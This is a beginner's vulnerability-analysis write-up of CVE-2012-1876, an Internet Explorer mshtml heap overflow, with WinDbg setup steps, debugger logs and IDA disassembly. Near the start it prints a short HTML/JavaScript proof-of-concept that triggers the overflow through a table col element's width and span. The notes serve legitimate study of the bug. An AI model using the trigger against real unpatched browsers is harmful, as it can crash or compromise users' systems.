CVE-2012-1876 Debugging Notes

Preface

While debugging CVE-2012-1876 from the book 漏洞战争 I took some notes. As for the vulnerability analysis itself, the book and VUPEN's article already explain it clearly.
Since this was my first time using WinDbg, I mainly recorded my environment setup (for example, how to import symbol files) and a very detailed debugging log, in the hope that it helps others who, like me, are just starting to learn vulnerability analysis and debugging.

References

Setting Up the Debugging Environment

Download

WinDbg symbol file settings

Enter the following in the WinDbg command window:

.sympath SRV*c:\localsymbols*http://msdl.microsoft.com/download/symbols

This has to be entered again after every restart.

PoC debugging

<html>
<body>
<table style="table-layout:fixed" >
<col id="132" width="41" span="1" >&nbsp </col>
</table>
<script>

function over_trigger() {
var obj_col = document.getElementById("132");
obj_col.width = "42765";
obj_col.span = 1000;
}

setTimeout("over_trigger();",1);

</script>
</body>
</html>

HPA-based vulnerability analysis

  • hpa: enables page heap, which places a dedicated guard page after each heap block to detect overflows; if a heap overflow touches the guard page, an exception is raised immediately.

Enable hpa with gflags from the command line.

After starting the IE browser, attach WinDbg to the process.


There are two processes: one is the broker process and the other is the page's content process. Attach to the latter, the content process.
Check whether hpa is enabled.

0:000> .symfix
0:000> .reload
Reloading current modules
................................................................
.............................
0:000> !gflag
Current NtGlobalFlag contents: 0x02000000
hpa - Place heap allocations at ends of pages

Then child-process debugging needs to be enabled, otherwise the debugger will not break.

.childdbg 1

Then type g to resume execution.

0:027> g
ModLoad: 74c30000 74c38000 C:\Windows\system32\credssp.dll
ModLoad: 752a0000 752a8000 C:\Windows\system32\secur32.dll
ModLoad: 750c0000 750f8000 C:\Windows\system32\ncrypt.dll
ModLoad: 750a0000 750b7000 C:\Windows\system32\bcrypt.dll
ModLoad: 74c70000 74cad000 C:\Windows\system32\bcryptprimitives.dll
ModLoad: 74b50000 74b66000 C:\Windows\system32\GPAPI.dll
ModLoad: 70c60000 70c7c000 C:\Windows\system32\cryptnet.dll
ModLoad: 72e70000 72e85000 C:\Windows\system32\Cabinet.dll
ModLoad: 74d10000 74d1e000 C:\Windows\system32\DEVRTL.dll


You can see the debugger is now running.
Then drag the PoC into the browser to run it.
Once the PoC has been dragged in, the debugger breaks automatically.

Type g once more, and it looks like this:

1:021> g
ModLoad: 760f0000 7610f000 C:\Windows\system32\IMM32.DLL
ModLoad: 75b40000 75c0c000 C:\Windows\system32\MSCTF.dll
ModLoad: 6ccf0000 6d76c000 C:\Windows\system32\IEFRAME.dll
ModLoad: 75da0000 75da5000 C:\Windows\system32\PSAPI.DLL
ModLoad: 72940000 7297c000 C:\Windows\system32\OLEACC.dll
ModLoad: 741a0000 7433e000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc\comctl32.dll
ModLoad: 75810000 7588b000 C:\Windows\system32\comdlg32.dll
ModLoad: 71620000 71655000 C:\Program Files\Internet Explorer\IEShims.dll
ModLoad: 75460000 7546c000 C:\Windows\system32\CRYPTBASE.dll
ModLoad: 74390000 743d0000 C:\Windows\system32\uxtheme.dll
ModLoad: 75500000 7550e000 C:\Windows\system32\RpcRtRemote.dll
ModLoad: 735b0000 735c3000 C:\Windows\system32\dwmapi.dll
ModLoad: 723c0000 723f3000 C:\Program Files\Internet Explorer\sqmapi.dll
ModLoad: 74f90000 74fa6000 C:\Windows\system32\CRYPTSP.dll
ModLoad: 76170000 7630d000 C:\Windows\system32\SETUPAPI.dll
ModLoad: 756b0000 756d7000 C:\Windows\system32\CFGMGR32.dll
ModLoad: 756e0000 756f2000 C:\Windows\system32\DEVOBJ.dll
ModLoad: 74d30000 74d6b000 C:\Windows\system32\rsaenh.dll
ModLoad: 764a0000 76523000 C:\Windows\system32\CLBCatQ.DLL
ModLoad: 743f0000 744e5000 C:\Windows\system32\propsys.dll
ModLoad: 6f9e0000 6fa0b000 C:\Program Files\Internet Explorer\ieproxy.dll
ModLoad: 772c0000 773b4000 C:\Windows\system32\WININET.dll
ModLoad: 76490000 76493000 C:\Windows\system32\Normaliz.dll
ModLoad: 75510000 7551b000 C:\Windows\system32\profapi.dll
ModLoad: 753f0000 7540a000 C:\Windows\system32\SspiCli.dll
ModLoad: 75db0000 75de5000 C:\Windows\system32\ws2_32.DLL
ModLoad: 759f0000 759f6000 C:\Windows\system32\NSI.dll
ModLoad: 74e10000 74e54000 C:\Windows\system32\dnsapi.DLL
ModLoad: 739a0000 739bc000 C:\Windows\system32\iphlpapi.DLL
ModLoad: 73980000 73987000 C:\Windows\system32\WINNSI.DLL
ModLoad: 6d920000 6d94e000 C:\Windows\system32\MLANG.dll
ModLoad: 75410000 7545b000 C:\Windows\system32\apphelp.dll
ModLoad: 73fe0000 74001000 C:\Windows\system32\ntmarta.dll
ModLoad: 77500000 77545000 C:\Windows\system32\WLDAP32.dll
ModLoad: 74a10000 74a19000 C:\Windows\system32\VERSION.dll
ModLoad: 67b10000 680c2000 C:\Windows\System32\mshtml.dll
ModLoad: 6e2c0000 6e2ea000 C:\Windows\System32\msls31.dll
ModLoad: 75470000 754cf000 C:\Windows\system32\SXS.DLL
ModLoad: 71270000 712a2000 C:\Windows\system32\WINMM.dll
ModLoad: 744f0000 74529000 C:\Windows\system32\MMDevAPI.DLL
ModLoad: 6daf0000 6db20000 C:\Windows\system32\wdmaud.drv
ModLoad: 6dae0000 6dae4000 C:\Windows\system32\ksuser.dll
ModLoad: 74730000 74737000 C:\Windows\system32\AVRT.dll
ModLoad: 6db20000 6db56000 C:\Windows\system32\AUDIOSES.DLL
ModLoad: 74760000 7476b000 C:\Windows\system32\msimtf.dll
ModLoad: 6dad0000 6dad8000 C:\Windows\system32\msacm32.drv
ModLoad: 6dab0000 6dac4000 C:\Windows\system32\MSACM32.dll
ModLoad: 6daa0000 6daa7000 C:\Windows\system32\midimap.dll


Then allow the ActiveX control to run.

(4b8.c00): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000009 ebx=00414114 ecx=04141149 edx=00004141 esi=06caf000 edi=06caf018
eip=67f3f167 esp=0452daa8 ebp=0452dab4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!CTableColCalc::AdjustForCol+0x15:
67f3f167 890f mov dword ptr [edi],ecx ds:0023:06caf018=????????

Then use kb to walk back through the stack:

1:025> kb
ChildEBP RetAddr Args to Child
0452dab4 67db5b8e 00414114 0452ddf8 00000001 mshtml!CTableColCalc::AdjustForCol+0x15
0452db64 67c20713 00000001 0452ddf8 000003e8 mshtml!CTableLayout::CalculateMinMax+0x52f
0452dd80 67c0af19 0452ddf8 0452ddc4 00000001 mshtml!CTableLayout::CalculateLayout+0x276
0452df2c 67cfcc48 0452f5a0 0452e158 00000000 mshtml!CTableLayout::CalcSizeVirtual+0x720
0452e064 67cef5d0 06e19ea8 00000000 00000000 mshtml!CLayout::CalcSize+0x2b8
0452e128 67cef31d 06e19ea8 0001769c 0001769c mshtml!CFlowLayout::MeasureSite+0x312
0452e170 67cef664 0779bf00 00000061 0452f5a0 mshtml!CFlowLayout::GetSiteWidth+0x156
0452e1b0 67cefb40 07bfafb0 06e19ea8 00000001 mshtml!CLSMeasurer::GetSiteWidth+0xce
0452e234 6e2c665d 07862ff8 0452e254 0452e318 mshtml!CEmbeddedILSObj::Fmt+0x150
0452e2c4 6e2c6399 07c12efc 00000000 07025d20 msls31!ProcessOneRun+0x3e9
0452e320 6e2c6252 07c12f18 00018258 00000000 msls31!FetchAppendEscCore+0x18e
0452e374 6e2c61c3 00000000 00000000 00000014 msls31!LsDestroyLine+0x47f
0452e3fc 6e2c293f 00000007 00003832 00000000 msls31!LsDestroyLine+0x9ff
0452e438 67cedd81 00000001 00000007 00003832 msls31!LsCreateLine+0xcb
0452e588 67d017cc 0452f5a0 00000007 07bfafc0 mshtml!CLSMeasurer::LSDoCreateLine+0x127
0452e62c 67d01ef5 0452ee90 0001769c 00000000 mshtml!CLSMeasurer::LSMeasure+0x34
0452e674 67d01db1 00000000 00017e6c 00000083 mshtml!CLSMeasurer::Measure+0x1e6
0452e698 67d011a2 00017e6c 00000083 0779bf40 mshtml!CLSMeasurer::MeasureLine+0x1c
0452e748 67d2a8f6 0452ec68 07470fd8 00000083 mshtml!CRecalcLinePtr::MeasureLine+0x46d
0452ef50 67d2b304 0452f5a0 00000007 0000000e mshtml!CDisplay::RecalcLines+0x8bb
0452f0a0 67d28c5c 0452f5a0 00000007 0000000e mshtml!CDisplay::UpdateView+0x208
0452f154 67d29ee3 0452f5a0 0452f6d8 0873cf10 mshtml!CFlowLayout::CommitChanges+0x9c
0452f264 67c0eb06 0452f5a0 0452f6d8 00000000 mshtml!CFlowLayout::CalcTextSize+0x30f
0452f4ec 67d002ee 0779bf00 0452f6d8 00000000 mshtml!CFlowLayout::CalcSizeCoreCompat+0x1045
0452f508 67d00367 0452f5a0 0452f6d8 00000000 mshtml!CFlowLayout::CalcSizeCore+0x49
0452f544 67d0029c 0452f5a0 0452f6d8 00000000 mshtml!CBodyLayout::CalcSizeCore+0xd8
0452f57c 67cfcc48 0452f5a0 0452f6d8 00000000 mshtml!CFlowLayout::CalcSizeVirtual+0x1af
0452f6b4 67c84121 0779bf00 00000001 00000000 mshtml!CLayout::CalcSize+0x2b8
0452f7a4 67d290f9 00100000 00000007 059ebeb4 mshtml!CFlowLayout::DoLayout+0x543
0452f7e0 67cec8ca 059eb870 00100000 0452f840 mshtml!CView::ExecuteLayoutTasks+0x3b
0452f824 67d2336d 00000000 0452f870 0000008d mshtml!CView::EnsureView+0x355
0452f848 67ce94b2 059eb870 00000000 06d24d58 mshtml!CView::EnsureViewCallback+0xd3
0452f87c 67cd37f7 0452f918 00008002 00000000 mshtml!GlobalWndOnMethodCall+0xff
0452f89c 75ce86ef 000f0402 00000012 00000000 mshtml!GlobalWndProc+0x10c
0452f8c8 75ce8876 67cc1de3 000f0402 00008002 USER32!InternalCallWinProc+0x23
0452f940 75ce89b5 00000000 67cc1de3 000f0402 USER32!UserCallWinProcCheckWow+0x14b
0452f9a0 75ce8e9c 67cc1de3 00000000 0452fa28 USER32!DispatchMessageWorker+0x35e
0452f9b0 6cde04a6 0452f9c8 00000000 00752f58 USER32!DispatchMessageW+0xf
0452fa28 6cdf0446 05688808 00000000 006ccff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x452
0452fae0 75f549bd 00752f58 00000000 0452fafc IEFRAME!LCIETab_ThreadProc+0x2c1
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\kernel32.dll -
0452faf0 76361174 006ccff0 0452fb3c 7741b3f5 iertutil!CIsoScope::RegisterThread+0xab
WARNING: Stack unwind information not available. Following frames may be wrong.
0452fafc 7741b3f5 006ccff0 73d26994 00000000 kernel32!BaseThreadInitThunk+0x12
0452fb3c 7741b3c8 75f549af 006ccff0 00000000 ntdll!__RtlUserThreadStart+0x70
0452fb54 00000000 75f549af 006ccff0 00000000 ntdll!_RtlUserThreadStart+0x1b

Missing-symbol problems may appear here; the fix is as follows.
Enter the following in the WinDbg command window:

.sympath SRV*c:\localsymbols*http://msdl.microsoft.com/download/symbols

Then you can see:

Analysis
First, the instruction that caused the crash (the analysis is in the comments of the listing below):

1:025> uf mshtml!CTableColCalc::AdjustForCol
mshtml!CTableColCalc::AdjustForCol:
67f3f152 8bff mov edi,edi
67f3f154 55 push ebp
67f3f155 8bec mov ebp,esp
67f3f157 8b08 mov ecx,dword ptr [eax]
67f3f159 53 push ebx
67f3f15a 8b5d08 mov ebx,dword ptr [ebp+8]
67f3f15d 57 push edi
67f3f15e 8bc1 mov eax,ecx
67f3f160 83e00f and eax,0Fh
67f3f163 8d7e18 lea edi,[esi+18h] ; edi is derived from esi, but esi is set up outside this function, so keep walking back up the call chain.
67f3f166 50 push eax
67f3f167 890f mov dword ptr [edi],ecx ; the store to the memory edi points to is what crashes
67f3f169 e89eacdbff call mshtml!CUnitValue::IsScalerUnit (67cf9e0c)
67f3f16e 85c0 test eax,eax
67f3f170 7411 je mshtml!CTableColCalc::AdjustForCol+0x31 (67f3f183)

...

Now it is clear that we need to set the breakpoint in the caller.
Restart WinDbg and attach again.

0:021> .childdbg 1
Processes created by the current process will be debugged
0:021> lmm mshtml
start end module name
0:021> sxe ld:mshtml
0:021> g

Now drag the PoC in (note that there is no prompt asking to allow ActiveX this time).

************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*

************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*
Symbol search path is: srv*
Executable search path is: srv*
Page heap: pid 0xDC4: page heap enabled with flags 0x3.
(dc4.e34): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=0016f5d8 edx=774064f4 esi=fffffffe edi=00000000
eip=7745e60e esp=0016f5f4 ebp=0016f620 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!LdrpDoDebuggerBreak+0x2c:
7745e60e cc int 3
1:014> g
ModLoad: 691c0000 69772000 C:\Windows\System32\mshtml.dll
eax=07237000 ebx=00000000 ecx=00171000 edx=00000000 esi=7ffda000 edi=0467b384
eip=774064f4 esp=0467b29c ebp=0467b2f0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!KiFastSystemCallRet:
774064f4 c3 ret

1:025> lm m mshtml
start end module name
691c0000 69772000 mshtml (deferred)
  • lm (List Loaded Modules)
    The lm command displays the specified loaded modules. The output includes the module status and path.

    • m Pattern
      Specifies a pattern that the module name must match. Pattern can contain a variety of wildcards and specifiers. For more information about the syntax, see String Wildcard Syntax.
  • sx displays the list of exceptions for the current process and the list of all non-exception events, and shows how the debugger behaves when it encounters each exception and event.

    • sxe Break
      When this exception occurs, the target breaks into the debugger immediately, before any error handler is activated. This kind of handling is called first-chance handling.
  • ld (Load Symbols)
    The ld command loads symbols for the specified module and refreshes all module information.

Put together, ld names the mshtml module being loaded, and sxe forces a break as soon as that module is loaded.
Now we can set a breakpoint on the function.

1:025> bp mshtml!CTableLayout::CalculateMinMax
1:025> bl
0 e 692d018a 0001 (0001) 1:**** mshtml!CTableLayout::CalculateMinMax
1:025> g
(c84.798): Unknown exception - code 80010108 (first chance)
(c84.8e8): Unknown exception - code 80010108 (first chance)
Breakpoint 0 hit
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018a esp=0467e4b0 ebp=0467e6c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff mov edi,edi
  • bp, bu, bm (Set Breakpoint)
    The bp, bu, and bm commands set one or more software breakpoints. Location, condition, and options can be combined to set many different kinds of software breakpoints.
  • bl (Breakpoint List)
    The bl command lists information about existing breakpoints.
  • g starts executing the specified process or thread. Execution stops when the program ends, when BreakAddress is reached, or when some other event causes the debugger to stop.

While debugging I used IDA as an aid, although it is not strictly necessary.
Locate CalculateMinMax directly by static analysis.

Symbols need to be imported here as well.


Continue by single-stepping: p steps one instruction (stepping over calls), and pressing Enter repeats it as well.

eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018a esp=0467e4b0 ebp=0467e6c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff mov edi,edi
1:025>
1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018c esp=0467e4b0 ebp=0467e6c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x2:
692d018c 55 push ebp
1:025>
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018d esp=0467e4ac ebp=0467e6c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x3:
692d018d 8bec mov ebp,esp
1:025>
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018f esp=0467e4ac ebp=0467e4ac iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x5:
692d018f 81ec90000000 sub esp,90h
1:025>
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d0195 esp=0467e41c ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0xb:
692d0195 53 push ebx
1:025>
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d0196 esp=0467e418 ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0xc:
692d0196 8b5d08 mov ebx,dword ptr [ebp+8] ss:0023:0467e4b4=0492aea8

Note mov ebx,dword ptr [ebp+8] ss:0023:0467e4b4=0492aea8: [ebp+8] is the first argument (you know how the stack frame is laid out, right?).

1:025> dd poi(ebp+8)
0492aea8->poi(ebp+8) 691c9868 06216f30 071d8fb8 69384918
0492aeb8 00000001 00000000 0108080d ffffffff
0492aec8 00000000 00000000 00000000 ffffffff
0492aed8 0001769c 0000a7f8 00000000 00000000
0492aee8 00000000 00412802 00000000 00000000
0492aef8 00000000 00000001 ffffffff ffffffff
0492af08 ffffffff ffffffff 691c9fd0 00000004
0492af18 00000004 0497eff0 691c9fd0 00000004
  • dd: double-word values (4 bytes)
    The default display count is 32 DWORDs (128 bytes).
  • poi()
    Pointer-sized data at the specified address. The pointer size is either 32 or 64 bits. In kernel-mode debugging, the size is based on the target machine's processor. In user-mode debugging on an Intel Itanium machine, the size is either 32 or 64 bits depending on the target application. So if you want pointer-sized data, it is best to use the poi operator.
1:025> dd poi(ebp+8)
0492aea8 691c9868 06216f30 071d8fb8 69384918
0492aeb8 00000001 00000000 0108080d ffffffff
0492aec8 00000000 00000000 00000000 ffffffff
0492aed8 0001769c 0000a7f8 00000000 00000000
0492aee8 00000000 00412802 00000000 00000000
0492aef8 00000000 00000001 ffffffff ffffffff
0492af08 ffffffff ffffffff 691c9fd0 00000004
0492af18 00000004 0497eff0 691c9fd0 00000004
1:025> ln 691c9868
(691c9868) mshtml!CTableLayout::`vftable' | (691c99a8) mshtml!CTableLayoutBlock::`vftable'
Exact matches:
mshtml!CTableLayout::`vftable' = <no type information>
  • ln displays the symbols at or near the given address.

So the first argument references the CTableLayout object, that is, the object behind the <table> tag.

1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d0199 esp=0467e418 ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0xf:
692d0199 56 push esi
1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d019a esp=0467e414 ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x10:
692d019a 8b750c mov esi,dword ptr [ebp+0Ch] ss:0023:0467e4b8=0467e740
1:025> p
eax=ffffffff ebx=0492aea8 ecx=00412802 edx=ffffffff esi=0467e740 edi=0467e70c
eip=692d019d esp=0467e414 ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x13:
692d019d 8b4628 mov eax,dword ptr [esi+28h] ds:0023:0467e768=00000000
1:025> p
eax=00000000 ebx=0492aea8 ecx=00412802 edx=ffffffff esi=0467e740 edi=0467e70c
eip=692d01a0 esp=0467e414 ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x16:
692d01a0 898574ffffff mov dword ptr [ebp-8Ch],eax ss:0023:0467e420=00171000
1:025> p
eax=00000000 ebx=0492aea8 ecx=00412802 edx=ffffffff esi=0467e740 edi=0467e70c
eip=692d01a6 esp=0467e414 ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x1c:
692d01a6 8b4354 mov eax,dword ptr [ebx+54h] ds:0023:0492aefc=00000001

ebx+54h points to the span value of the col element inside the table tag; the PoC has only one span value, 1, so 1 is assigned here.

Honestly, reading assembly like this in WinDbg is painful, so from here on let's use IDA.

.text:74D3018A
.text:74D3018A mov edi, edi
.text:74D3018C push ebp
.text:74D3018D mov ebp, esp
.text:74D3018F sub esp, 90h
.text:74D30195 push ebx ; struct tagSIZE *
.text:74D30196 mov ebx, [ebp+arg_0] ;-> the first argument references the CTableLayout object, i.e. the table tag's object in memory.
.text:74D30199 push esi ; struct CTableCalcInfo *
.text:74D3019A mov esi, [ebp+arg_4]
.text:74D3019D mov eax, [esi+28h]
.text:74D301A0 mov [ebp+var_8C], eax
.text:74D301A6 mov eax, [ebx+54h] ; -> the sum of the span attribute values, which we label spansum
.text:74D301A9 mov [ebp+arg_0], eax ; -> arg_0=spansum
.text:74D301AC mov eax, [ebx+128h]
.text:74D301B2 shr eax, 2
...
...
...
.text:74D30293 loc_74D30293: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+105j
.text:74D30293 mov edx, [ebp+arg_0] ;-> edx=arg_0=spansum
.text:74D30296 mov eax, edx
.text:74D30298 sub eax, ecx
.text:74D3029A mov [ebp+var_1C], eax
.text:74D3029D push 0
.text:74D3029F pop eax
.text:74D302A0 setz al
.text:74D302A3 mov [ebx+50h], ecx
.text:74D302A6 shl eax, 8
.text:74D302A9 xor eax, [ebx+44h]
.text:74D302AC and eax, 100h
.text:74D302B1 xor [ebx+44h], eax
.text:74D302B4 test byte ptr [esi+2Ch], 1
.text:74D302B8 jnz loc_74C5EE4D
.text:74D302BE
.text:74D302BE loc_74D302BE: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)-D133Bj
.text:74D302BE xor eax, eax
.text:74D302C0
.text:74D302C0 loc_74D302C0: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1957B9j
.text:74D302C0 or [ebp+var_38], eax
.text:74D302C3 cmp [ebp+arg_8], edi
.text:74D302C6 jnz loc_74EC5948
.text:74D302CC mov eax, [ebx+94h] ;-> CTableLayout+0x94, compared against spansum; labelled spancmp here
.text:74D302D2 shr eax, 2 ;-> spancmp>>2, i.e. spancmp/4
.text:74D302D5 cmp eax, edx ; jump if spancmp >= spansum; here 0<1, so no jump.
.text:74D302D7 jge short loc_74D30312
.text:74D302D9 cmp edx, edi
.text:74D302DB lea esi, [ebx+90h]
.text:74D302E1 jl loc_74C2CE82
.text:74D302E7 cmp edx, [esi+8]
.text:74D302EA jbe short loc_74D302FF
.text:74D302EC push 1Ch ; unsigned int
.text:74D302EE mov eax, edx
.text:74D302F0 mov edi, esi
.text:74D302F2 call ?EnsureSizeWorker@CImplAry@@AAEJIJ@Z ; CImplAry::EnsureSizeWorker(uint,long)

Stepping into CImplAry::EnsureSizeWorker shows that it mainly allocates heap memory. The allocated size is spansum * 0x1C; although spansum is 1 here, the minimum allocation is 0x1C * 4 = 0x70. The address of the allocation is stored at CTableLayout+0x9C.

.text:74DF8F9C ; public: long __thiscall CDataAry<long>::EnsureSize(long)
.text:74DF8F9C ?EnsureSize@?$CDataAry@J@@QAEJJ@Z proc near
.text:74DF8F9C ; CODE XREF: CTimerCtx::CTimerCtx(CTimerMan *,_RTL_CRITICAL_SECTION *)+ACp
.text:74DF8F9C ; CDocument::EnumObjects(ulong,IEnumUnknown * *)+6Bp ...
.text:74DF8F9C
.text:74DF8F9C ; FUNCTION CHUNK AT .text:74DF9013 SIZE 00000009 BYTES
.text:74DF8F9C ; FUNCTION CHUNK AT .text:74EBD728 SIZE 00000007 BYTES
.text:74DF8F9C
.text:74DF8F9C mov edi, edi
.text:74DF8F9E push edi ; __int32
.text:74DF8F9F mov edi, ecx
.text:74DF8FA1 test eax, eax
.text:74DF8FA3 jl loc_74EBD728
.text:74DF8FA9 cmp eax, [edi+8]
.text:74DF8FAC ja short loc_74DF9013
.text:74DF8FAE xor eax, eax
.text:74DF8FB0 pop edi
.text:74DF8FB1 retn
.text:74DF8FB1 ?EnsureSize@?$CDataAry@J@@QAEJJ@Z endp
.text:74DF8FB1
.text:74DF8FB1 ; ---------------------------------------------------------------------------
.text:74DF8FB2 db 5 dup(90h)
.text:74DF8FB7
.text:74DF8FB7 ; =============== S U B R O U T I N E =======================================
.text:74DF8FB7
.text:74DF8FB7 ; Attributes: bp-based frame
.text:74DF8FB7
.text:74DF8FB7 ; __int32 __thiscall CImplAry::EnsureSizeWorker(CImplAry *__hidden this, unsigned int, __int32)
.text:74DF8FB7 ?EnsureSizeWorker@CImplAry@@AAEJIJ@Z proc near
.text:74DF8FB7 ; CODE XREF: CSelectionRenderingServiceProvider::GetSelectionChunksForLayout(CFlowLayout *,CRenderInfo *,CDataAry<HighlightSegment> *,int *,int *)-6B92p
.text:74DF8FB7 ; CView::DeferTransition(COleSite *)+3Fp ...
.text:74DF8FB7
.text:74DF8FB7 dwBytes = dword ptr -8
.text:74DF8FB7 var_4 = dword ptr -4
.text:74DF8FB7 Size = dword ptr 8
.text:74DF8FB7
.text:74DF8FB7 ; FUNCTION CHUNK AT .text:74E02CB4 SIZE 00000036 BYTES
.text:74DF8FB7 ; FUNCTION CHUNK AT .text:74E3BEEC SIZE 0000003D BYTES
.text:74DF8FB7 ; FUNCTION CHUNK AT .text:74EBD6E7 SIZE 0000000D BYTES
.text:74DF8FB7
.text:74DF8FB7 mov edi, edi
.text:74DF8FB9 push ebp
.text:74DF8FBA mov ebp, esp
.text:74DF8FBC push ecx
.text:74DF8FBD push ecx
.text:74DF8FBE push ebx
.text:74DF8FBF push esi
.text:74DF8FC0 mov esi, eax
.text:74DF8FC2 push 4
.text:74DF8FC4 pop eax
.text:74DF8FC5 mov [ebp+var_4], eax
.text:74DF8FC8 cmp esi, eax
.text:74DF8FCA jnb loc_74E02CB4
.text:74DF8FD0
.text:74DF8FD0 loc_74DF8FD0:
.text:74DF8FD0 ; CImplAry::EnsureSizeWorker(uint,long)+9D25j ...
.text:74DF8FD0 mov eax, [ebp+var_4] ; -> eax=4
.text:74DF8FD3 mul [ebp+Size] ; -> allocates spansum*0x1C bytes, at least 0x1C*4=0x70
.text:74DF8FD6 push edx
.text:74DF8FD7 push eax ;-> size argument
.text:74DF8FD8 lea eax, [ebp+dwBytes]
.text:74DF8FDB call ?ULongLongToUInt@@YGJ_KPAI@Z ; ULongLongToUInt(unsigned __int64,uint *)
.text:74DF8FE0 mov ebx, eax
.text:74DF8FE2 test ebx, ebx
.text:74DF8FE4 jnz short loc_74DF900B
.text:74DF8FE6 test byte ptr [edi+4], 2
.text:74DF8FEA jnz loc_74E3BEEC
.text:74DF8FF0 push [ebp+dwBytes] ;-> spansum*0x1c=0x1c
.text:74DF8FF3 lea esi, [edi+0Ch]
.text:74DF8FF6 call ?_HeapRealloc@@YGJPAPAXI@Z ; -> once CImplAry::EnsureSizeWorker finishes, the returned address is saved at CTableLayout+0x90+0xC; this is the heap block involved in the vulnerability, labelled vulheap
.text:74DF8FFB mov ebx, eax
.text:74DF8FFD test ebx, ebx
.text:74DF8FFF jnz short loc_74DF900B
.text:74DF9001

Let's look at the address of the allocated buffer vulheap.

1:025> bp mshtml!CTableLayout::CalculateMinMax+0x168
1:025> g
Breakpoint 1 hit
eax=00000001 ebx=0492aea8 ecx=00000000 edx=00000001 esi=0492af38 edi=0492af38
eip=692d02f2 esp=0467e40c ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x1d3:
692d02f2 e8c08c0c00 call mshtml!CImplAry::EnsureSizeWorker (69398fb7)

The allocated address is stored at ebx+0x9C.

1:025> p
eax=00000000 ebx=0492aea8 ecx=7741349f edx=00000000 esi=0492af38 edi=0492af38
eip=692d02f7 esp=0467e410 ebp=0467e4ac iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x1df:
692d02f7 85c0 test eax,eax
1:025> dd ebx+9c
0492af44 07e20f90 00000000 00000000 00000000
0492af54 00000000 00000000 00000000 00000000
0492af64 00000000 000000c8 000000c8 00000000
0492af74 00000000 00000000 00000000 00000000
0492af84 00000000 00000000 00000000 00000000
0492af94 00000000 00000000 00000000 00000000
0492afa4 00000000 00000000 00000000 ffffffff
0492afb4 00000001 00000000 00000000 00000000
1:025> dd 07e20f90
07e20f90 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
